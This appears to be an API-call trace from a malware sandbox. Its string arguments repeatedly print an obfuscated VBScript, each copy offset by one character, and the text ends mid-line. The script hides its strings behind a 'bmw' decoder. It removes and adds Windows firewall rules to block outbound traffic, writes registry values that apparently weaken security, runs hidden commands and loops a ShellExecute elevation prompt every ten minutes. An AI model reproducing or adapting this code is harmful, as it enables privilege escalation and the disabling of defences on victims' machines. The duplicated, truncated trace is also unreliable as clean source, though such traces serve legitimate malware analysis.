bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0223.002] wcsncmp (_String1="(InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 27 [0223.003] wcsncmp (_String1="InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 60 [0223.003] wcsncmp (_String1="nStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97 [0223.003] wcsncmp (_String1="Str(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 70 [0223.003] wcsncmp (_String1="tr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite 